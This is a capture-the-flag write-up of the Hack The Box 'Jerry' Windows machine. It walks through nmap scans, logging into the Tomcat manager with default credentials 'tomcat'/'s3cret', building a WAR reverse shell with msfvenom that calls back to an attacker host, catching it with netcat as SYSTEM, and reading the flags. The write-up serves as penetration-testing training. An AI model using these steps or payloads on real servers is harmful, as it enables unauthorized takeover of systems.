Jerry - wook413

#windows #hackthebox #easy ![[Pasted image 20250612211144.png]] # Port scanning - Nmap TCP all ports scan ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn] └─$ sudo nmap -sS 10.10.10.95 -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 20:25 CDT Nmap scan report for 10.10.10.95 Host is up (0.049s latency). Not shown: 65534 filtered tcp ports (no-response) Some closed ports may be reported as filtered due to --defeat-rst-ratelimit PORT STATE SERVICE 8080/tcp open http-proxy Nmap done: 1 IP address (1 host up) scanned in 43.88 seconds ``` UDP top 1000 ports scan ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn] └─$ sudo nmap -sU 10.10.10.95 --top-ports 1000 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 20:30 CDT Nmap scan report for 10.10.10.95 Host is up (0.051s latency). All 1000 scanned ports on 10.10.10.95 are in ignored states. Not shown: 1000 open|filtered udp ports (no-response) Nmap done: 1 IP address (1 host up) scanned in 52.68 seconds ``` TCP port 8080 detailed scan ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn] └─$ nmap -sCV 10.10.10.95 -p 8080 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-12 20:32 CDT Nmap scan report for 10.10.10.95 Host is up (0.054s latency). PORT STATE SERVICE VERSION 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 |_http-open-proxy: Proxy might be redirecting requests |_http-title: Apache Tomcat/7.0.88 |_http-server-header: Apache-Coyote/1.1 |_http-favicon: Apache Tomcat Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.88 seconds ``` # Footprinting Navigated to 10.10.10.95:8080 in browser to find Apache Tomcat site ![[Pasted image 20250612203601.png]] `10.10.10.95:8080/manager` page reveals a username `tomcat` and password `s3cret` ![[Pasted image 20250612204738.png]] I tried the credentials and it worked. ![[Pasted image 20250612205438.png]] Scrolled down a bit and I found file upload feature which seems to only accept `WAR` files. ![[Pasted image 20250612205518.png]] Created a WAR reverse shell using msfvenom ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.11 LPORT=1234 -f war -o shell.war Payload size: 1091 bytes Final size of war file: 1091 bytes Saved as: shell.war ``` I uploaded the reverse shell, set up a listener, and clicked 'Deploy', which created a new application path called `/shell`. I navigated to that path and it triggered the reverse shell. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.95] 49196 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\apache-tomcat-7.0.88>whoami whoami nt authority\system ``` In the path `C:\Users\Administrator\Desktop\flags`, the file named "2 for the price of 1.txt" contained both `user.txt` and `root.txt` flags. ```bash C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt" type "2 for the price of 1.txt" user.txt 7004... root.txt 04a8... ```